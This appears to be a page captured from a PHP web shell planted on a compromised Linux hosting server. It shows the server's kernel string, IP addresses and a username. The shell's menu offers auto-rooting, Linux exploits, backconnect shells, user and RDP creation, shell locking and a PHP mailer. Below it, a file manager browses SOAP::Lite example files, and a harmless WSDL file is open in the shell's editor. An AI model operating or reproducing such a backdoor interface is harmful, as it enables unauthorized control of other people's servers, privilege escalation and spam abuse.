Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libsoap-lite-perl /
examples /
WSDL /
[ HOME SHELL ]
Name
Size
Permission
Action
dynamic1.pl
497
B
-rw-r--r--
dynamic2.pl
281
B
-rw-r--r--
dynamic3.pl
302
B
-rw-r--r--
dynamic4.pl
331
B
-rw-r--r--
say_hello_doclit.pl
448
B
-rw-r--r--
say_hello_doclit.wsdl
1.95
KB
-rw-r--r--
say_hello_rpcenc.pl
359
B
-rw-r--r--
say_hello_rpcenc.wsdl
1.45
KB
-rw-r--r--
say_hello_rpcenc_schema.pl
185
B
-rw-r--r--
say_hello_rpclit.pl
517
B
-rw-r--r--
say_hello_rpclit.wsdl
1.88
KB
-rw-r--r--
stub1.pl
293
B
-rw-r--r--
stub2.pl
305
B
-rw-r--r--
stub3.pl
334
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : say_hello_rpcenc.wsdl
<definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:s="http://www.w3.org/2001/XMLSchema" xmlns:s0="urn:HelloWorld" targetNamespace="urn:HelloWorld" xmlns="http://schemas.xmlsoap.org/wsdl/"> <types> <s:schema targetNamespace="urn:HelloWorld"> </s:schema> </types> <message name="sayHello"> <part name="name" type="s:string" /> <part name="givenName" type="s:string" /> </message> <message name="sayHelloResponse"> <part name="sayHelloResult" type="s:string" /> </message> <portType name="Service1Soap"> <operation name="sayHello"> <input message="s0:sayHello" /> <output message="s0:sayHelloResponse" /> </operation> </portType> <binding name="Service1Soap" type="s0:Service1Soap"> <soap:binding transport="http://schemas.xmlsoap.org/soap/http" style="rpc" /> <operation name="sayHello"> <soap:operation soapAction="urn:HelloWorld#sayHello"/> <input> <soap:body use="encoded" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/> </input> <output> <soap:body use="encoded" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/> </output> </operation> </binding> <service name="HelloWorld"> <port name="HelloWorldSoap" binding="s0:Service1Soap"> <soap:address location="http://localhost:80/soap-wsdl-test/helloworld.pl" /> </port> </service> </definitions>
Close